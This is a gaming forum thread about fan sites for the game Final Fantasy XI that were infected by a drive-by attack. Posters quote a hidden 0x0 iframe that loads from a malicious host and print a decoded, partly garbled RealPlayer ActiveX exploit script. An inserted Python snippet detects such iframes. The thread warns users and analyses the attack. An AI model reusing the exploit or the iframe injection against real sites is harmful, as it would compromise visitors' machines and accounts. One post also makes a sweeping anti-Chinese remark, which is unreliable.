  1. #201
    Ratznest
    Guest

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Hello all. I usually spend my time reading posts and lurking, but recent events have drawn me out of hiding.

    My job in real life is as a computer system security tech, and I have my CISSP. I have been reading every post I can find, each symptom, behavior, to figure out what could have caused it. It's very difficult to pinpoint considering the wide variety of OS platforms, browsers in use and sites people visit.

    However, a bit of parallel research at my job yesterday did shed a bit of light. (Note - I cannot post where I got this info. Even if I could, most people reading this would not be able to access the site. I apologize for not being able to link it.)

    In Sept and Oct of this year, I received several security alerts regarding IE, Firefox, RealPlayer and Apple Quicktime. They were new security vulnerabilities discovered, and only 3 had public exploits known to be available. All of them noted that the aforementioned media applications could be used to execute malicious code through the browsers and run programs on a PC viewing a website. These new vulnerabilities would be perfect to hit, as anyone not updating their virus scans would totally miss them... Even on Firefox.

    I receive hundreds of these alerts, so these didn't seem particularly bad at the time. We patch, we update, we go on... we stay paranoid in the security dept at my work. :)

    Personally, these alerts seem to be the ones that opened the holes I am seeing. As for what the malicious code is putting onto the PCs is anyone's guess after that point. Once open, they can do anything your current user has rights to do. Consider opening your browser with limited rights, as this will help guard against new threats a virus scanner won't pick up.

    Update all your programs, not just virus scans, firewalls and operating systems. The current trend among "hackers" is away from hacking the operating systems, and they are targeting plugins more lately.

    I hope this information helps prevent more of us from having our accounts stolen.
    ________________________________
    Security holes since Sept 06: IE - 11, Firefox - 8, Mac OS X - 7, Windows PC OS's - 31+, Internet Protocols - 9 ... you're not safe no matter what you use.

  2. #202
    Melee Summoner
    Join Date
    Jan 2008
    Posts
    25
    BG Level
    1

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Just an FYI... yes, my site was temporarily hacked, as were the other 8 sites on my server. It was pretty much harmless; all they did was change the index pages. I contacted my host and changed all my passwords, and the site is back up and running fine.

    Apnea

  3. #203
    Puppetmaster
    Join Date
    Nov 2007
    Posts
    62
    BG Level
    2
    FFXI Server
    Leviathan

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Big big warning : ffxi-atlas.com is infected.

    Iframe at the bottom right under the little affiliate banners, little black box, similar to somepage.com

    Contains:

    " <iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe> "

    which contains the bogus javascript code (I guess similar realplayer exploit as one of my lsmates got the realplayer warning).

    Please pass this information on.

    http://ao.legionhq.org/atlas.jpg

  4. #204
    Salvage Bans
    Join Date
    Dec 2005
    Posts
    953
    BG Level
    5

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Quote Originally Posted by ramp
    Big big warning : ffxi-atlas.com is infected.

    Iframe at the bottom right under the little affiliate banners, little black box, similar to somepage.com

    Contains:

    " <iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe> "

    which contains the bogus javascript code (I guess similar realplayer exploit as one of my lsmates got the realplayer warning).

    Please pass this information on.
    Removed, thanks for the info. Looking into how it got there......anyone know if any unpatched security holes in apache/php/phpbb?

  5. #205
    Salvage Bans
    Join Date
    Dec 2005
    Posts
    953
    BG Level
    5

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Looks like they're using the Real Audio exploit and ActiveX.

    The decoded javascript comes to

    Code:
    <!-- ScRIpT language=jAvAsCrIpT>
    kxmz="Gd"
    ldzi="dp"
    hjlo="cP"
    wyad="DG"
    mjhb="xf"
    qjyf="up"
    gomv="pP"
    esih="PC"
    vahe="sl"
    bwaj="Pe"
    qptw="pu"
    lupe="Pe"
    gmsq="CE"
    qaxo="WE"
    jsps="pO"
    qerd="OU"
    upyd="fQ"
    mmsr="ph"
    pjqp="kM"
    yfss="Lu"
    umso="pE"
    xeqx="SO"
    thrb="ou"
    xies="Vp"
    ulaz="XO"
    pggs="oU"
    nluv="Fp"
    glqf="lE"
    ocbv="Qu"
    ichu="Fh"
    vcix="kG"
    ymzo="EC"
    eigs="LX"
    hkub="kw"
    vqwo="TR"
    guki="nw"
    xein="xp"
    vczs="sO"
    yxfg="Ee"
    qwhg="fH"
    jafj="Kg"
    nhlf="VR"
    xtmv="pP"
    wngm="SO"
    hmfq="ec"
    hkxf="Cl"
    pmaf="yd"
    yufh="Yd"
    tjry="qz"
    edks="MP"
    enjr="sl"
    ayig="eC"
    ctie="sM"
    pjfw="kp"
    cqjs="ok"
    roye="NQ"
    ubem="pC"
    egvc="JM"
    btcd="fg"
    qite="tP"
    svkg="xL"
    sfad="AL"
    ydxw="Kp"
    vkqm="MP"
    wxlb="cm"
    kywx="ZT"
    ygjf="PN"
    nzst="Ko"
    olbv="qc"
    ngop="Ka"
    muir="OG"
    gqkt="eN"
    itdq="WE"
    tkqr="NX"
    fswz="kU"
    sdjo="NB"
    akxy="TP"
    xuxu="CM"
    cige="mf"
    wnll="VX"
    rhwh="KP"
    dajx="Ld"
    iael="Kx"
    acvb="ku"
    omrq="Nq"
    vbhf="LP"
    hokj="Sm"
    pjxe="MX"
    giib="kP"
    naed="Dh"
    qwzq="KP"
    jdiw="cl"
    omzz="ej"
    civk="KE"
    jgii="ne"
    ikyl="yL"
    msdy="sN"
    trfx="XE"
    pczp="GO"
    snyl="OO"
    jdmy="OO"
    syrx="oh"
    ufub="nT"
    zzst="NP"
    tdza="nN"
    shqt="Ll"
    pmuj="aW"
    xpwj="iN"
    mgwo="uK"
    odzf="xY"
    yfjp="Ho"
    ljir="nX"
    nkog="Zp"
    jdqf="Ng"
    aucy="nM"
    woge="hn"
    gqty="Rg"
    nfxy="sc"
    gaty="VQ"
    quas="jb"
    diks="Og"
    pniu="pF"
    iumj="xW"
    nthi="dw"
    baua="Tg"
    nlqn="PS"
    dkqf="jr"
    loxk="OB"
    bqhl="Og"
    irwb="GW"
    whss="wg"
    tlbl="wr"
    kgrx="Nw"
    lcho="Pv"
    yepj="LV"
    vzdh="Qw"
    qevl="IV"
    lxln="OV"
    bbjy="nF"
    mxuz="lf"
    pbao="nF"
    fmbo="Iv"
    cdil="ER"
    qhww="nf"
    irru="cv"
    wner="Ov"
    iwcd="MB"
    pkpn="oW"
    cfnb="pF"
    swbb="aw"
    bamn="Dv"
    uvhs="SF"
    mynm="hb"
    ltgd="ov"
    bnpi="lf"
    agqo="Qw"
    hnvk="Cg"
    xnmp="Du"
    eqto="OG"
    fvnj="pF"
    otyn="ag"
    exuj="Tf"
    runn="sF"
    rscr="xr"
    puor="oG"
    qtmq="Pf"
    xstq="aW"
    uoti="tV"
    yxrz="cV"
    xgax="xR"
    olmt="Nv"
    kccj="Eg"
    ktkw="hv"
    wvev="EP"
    pddu="P"
    djsw="TY"
    psqq="XX"
    atdr="XX"
    qwbe="fi"
    obom="Aq"
    fodb="cY"
    xpxh="fP"
    wufy="AA"
    njlo="ei"
    sugg="Ao"
    stps="HF"
    zgpo="XZ"
    jzfq="Pi"
    pzic="Ak"
    aoed="jb"
    ojuj="rI"
    uwxl="Pi"
    oxbp="Ag"
    ppvv="Vb"
    lpmd="aa"
    thwz="Pi"
    qohc="Ac"
    mtzn="kw"
    touu="zO"
    krrn="PL"
    bhee="iA"
    zbka="sl"
    xexm="oU"
    dtfn="WP"
    hpdp="iA"
    ryan="Zc"
    lpjr="za"
    somv="bP"
    chun="iA"
    iybi="Vq"
    ghyc="Kp"
    zfwi="AP"
    ljbe="iA"
    axyd="RC"
    lwrq="pD"
    ehyj="XP"
    pdbd="Ql"
    azku="aa"
    kfvn="Tb"
    rlnl="aa"
    adfg="aL"
    ymkk="tU"
    towd="AA"
    drsg="AA"
    mdep="CF"
    nzdk="ia"
    igqg="aP"
    ofvv="oH"
    yftm="Hm"
    ukaj="Da"
    fzdu="hi"
    cmlk="va"
    qofl="bo"
    dtvg="wa"
    vqqw="bX"
    dhlo="kn"
    bvwh="EN"
    blnc="Ij"
    tkpa="dp"
    jnvz="PP"
    zsjd="PP"
    jbfh="pU"
    wrwx="ov"
    slzr="dz"
    ihqh="As"
    ckmn="Pp"
    hdll="PP"
    knnx="pP"
    jwuh="Ph"
    oqyq="kt"
    jrow="pp"
    umee="lX"
    qxhz="Kw"
    hcpu="pq"
    sluo="lz"
    phcg="mh"
    ugrj="KV"
    diqh="HP"
    ewwh="xX"
    seqc="Ko"
    wyxw="Gf"
    cfnv="ZP"
    yqux="tu"
    iqib="YN"
    cfdy="hD"
    mwzh="tp"
    hpxr="pP"
    xian="pP"
    zrtn="pN"
    wqyt="Bo"
    vyqa="Yf"
    bhui="Xf"
    faio="of"
    bcqq="NP"
    ncvq="PP"
    uszl="pF"
    vjwl="hG"
    bcmn="Eg"
    jrmk="Bv"
    ebed="LF"
    ayls="me"
    gsfj="tO"
    vqvp="oa"
    sbew="fX"
    ihme="KN"
    cjuf="xn"
    kclq="hB"
    csdl="nP"
    mgpy="pP"
    kokn="pP"
    cnce="PH"
    efhw="Cn"
    lutg="LR"
    hgnw="PX"
    xntf="Km"
    ebhj="lV"
    lgzt="Jr"
    alwd="pu"
    farx="co"
    nyyl="Oe"
    zcug="fP"
    dmjm="Dl"
    rfmr="gp"
    wwix="tp"
    vett="SU"
    lbfg="lV"
    dlvf="qR"
    davr="NV"
    yntp="eL"
    mfpz="PR"
    acqc="OD"
    eqka="UC"
    xdzj="TV"
    bnry="ER"
    qycq="SI"
    rrqh="ON"
    kk();
    function kk()
    {
    	var user = navigator.userAgent.toLowerCase();
    	if(user.indexOf("nt 5.")==-1)
    		return;
    	if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
    		return;
    
    	try
    	{
    		Real = new ActiveXObject("IER" + "PCtl.I" + "ERP" + "Ctl.1");
    	}catch(error)
    	{
    		return;
    	}
    	werq = Real.PlayerProperty(mfpz+acqc+eqka+xdzj+bnry+qycq+rrqh);
    	sfsdf = "";
    	jiji = unescape("%75%06%74%04");
    	for(i=0;i<32*148;i++)
    		sfsdf += "S";
    
    	
    	if(werq.indexOf("6.0.14.") == -1)
    	{
    		if(navigator.userLanguage.toLowerCase() == "zh-cn")
    			ret = unescape("%7f%a5%60");
    		else if(navigator.userLanguage.toLowerCase() == "en-us")
    			ret = unescape("%4f%71%a4%60");
    		else
    			return;
    	}
    	else if(werq == "6.0.14.544")
    		ret = unescape("%63%11%08%60");
    	else if(werq == "6.0.14.550")
    		ret = unescape("%63%11%04%60");
    	else if(werq == "6.0.14.552")
    		ret = unescape("%79%31%01%60");
    	else if(werq == "6.0.14.543")
    		ret = unescape("%79%31%09%60");
    	else if(werq == "6.0.14.536")
    		ret = unescape("%51%11%70%63");
    	else
    		return;
    
    	\"c:\\Program Files\\";
    	iusd  = "NetMeeting\\TestSnd";
    	Real.Imporkswdf +iusd + ".wav", gogo,"", 0, 0);
    }
    
    </sCrIpT>
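
Added example, not code from this thread or from any of the sites named in it: a small Python triage script for a site owner who, like the poster of #204, wants to find an injected 0x0 iframe in their pages and read through the string-splitting obfuscation seen in the decoded script above. The sample HTML is constructed from the snippets quoted in the thread, and the site hostname passed in is an assumption.

```python
"""Triage helpers for the hidden-iframe / split-string pattern in this thread."""
import re
from urllib.parse import urlparse

# Constructed sample modelled on the snippets quoted in posts #203 and #205.
SAMPLE_HTML = """
<html><body>Affiliate banners...
<iframe src="/banner.html" width="468" height="60"></iframe>
<iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe>
<ScRIpT language=jAvAsCrIpT>
mfpz="PR"
acqc="OD"
eqka="UC"
xdzj="TV"
bnry="ER"
qycq="SI"
rrqh="ON"
Real = new ActiveXObject("IER" + "PCtl.I" + "ERP" + "Ctl.1");
werq = Real.PlayerProperty(mfpz+acqc+eqka+xdzj+bnry+qycq+rrqh);
</sCrIpT></body></html>"""

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
# One assignment per line of a short literal, as in the decoded script.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*;?\s*$', re.M)
# A chain of two or more literals/names joined by '+'.
CONCAT_RE = re.compile(r'((?:"[^"]*"|\w+)(?:\s*\+\s*(?:"[^"]*"|\w+))+)')

def hidden_iframes(html, site_host):
    """Return src values of iframes that are 0x0 or that load from another host."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src stays on-site
        zero = attrs.get("height") == "0" or attrs.get("width") == "0"
        if zero or host != site_host:
            hits.append(src)
    return hits

def resolve_strings(script):
    """Fold name="xx" assignments and '+' chains back into the literals they hide."""
    table = dict(ASSIGN_RE.findall(script))
    out = []
    for m in CONCAT_RE.finditer(script):
        parts = [p.strip() for p in m.group(1).split("+")]
        try:
            out.append("".join(p[1:-1] if p.startswith('"') else table[p] for p in parts))
        except KeyError:
            continue  # chain uses a name we never saw assigned; leave it for manual review
    return out
```

Resolving the chains in the sample yields the ActiveX ProgID and the property name the script looks up, so an analyst can see what the page is probing for without running it.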

  6. #206
    New Merits
    Join Date
    Dec 2007
    Posts
    235
    BG Level
    4
    FFXI Server
    Ifrit

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    did a whois on playonlnie.com:

    Domain Name: PLAYONLNIE.COM
    Registrar: BIZCN.COM, INC.
    Whois Server: whois.bizcn.com
    Referral URL: http://www.bizcn.com
    Name Server: NS1.MYHOSTADMIN.NET
    Name Server: NS2.MYHOSTADMIN.NET
    Status: clientDeleteProhibited
    Status: clientTransferProhibited
    Updated Date: 12-jan-2008
    Creation Date: 12-jan-2008
    Expiration Date: 12-jan-2009

    http://www.bizcn.com is a Chinese domain registration website, and from the looks of it, the RMT just set this new attack up recently (Jan 12), so be safe people...

    China attacking again!!

  7. #207
    Relic Weapons
    Join Date
    Jun 2007
    Posts
    393
    BG Level
    4
    FFXI Server
    Alexander

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Do not know if this is related to any of these, but in the last hour I have had numerous inbound scanning attempts from these remote addresses while viewing BG only.

    Remote address: 76.253.167.79 and 76.16.79.92
    Remote port:53205 and 36271
    dns were comcast.net and sbcglobal.net

    Both were blocked, but I have never had either of these in my alert logs before. I have also never had any alerts pop up while viewing bg before either.

  8. #208
    New Spam Forum
    Join Date
    Jul 2007
    Posts
    179
    BG Level
    3

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Looks like AVG was compromised too although it's not targeted at FFXI. If you visited the AVG download page recently you might want to double check to make sure you are not affected by this.

    http://news.yahoo.com/s/infoworld/20...9gynp8J2YjtBAF

  9. #209
    New Merits
    Join Date
    Jun 2007
    Posts
    232
    BG Level
    4
    FFXI Server
    Odin

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Quote Originally Posted by Fodder
    Looks like AVG was compromised too although it's not targeted at FFXI. If you visited the AVG download page recently you might want to double check to make sure you are not affected by this.

    http://news.yahoo.com/s/infoworld/20...9gynp8J2YjtBAF
    You might wanna read that again, the company that got hacked was AvSoft Technologies which makes smartCOP and smartdog products, while AVG is created by a company called Grisoft. The only mention of AVG in there was a quote from their chief research officer.

  10. #210
    I Am, Who I Am.
    Join Date
    Nov 2005
    Posts
    15,994
    BG Level
    9
    FFXIV Character
    Trixi Sephyuyx
    FFXIV Server
    Excalibur
    FFXI Server
    Ragnarok

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    lul, just got a mcafee message blocking a trojan coming from a google ad on ffxi-atlas.

  11. #211
    CoP Dynamis
    Join Date
    Nov 2005
    Posts
    255
    BG Level
    4

    Re: FFXI: JavaScript exploit on the loose(Repairs inside)

    Iframe is up on ffxiah.com right under the first server name on the main page. Noscript blocked it.
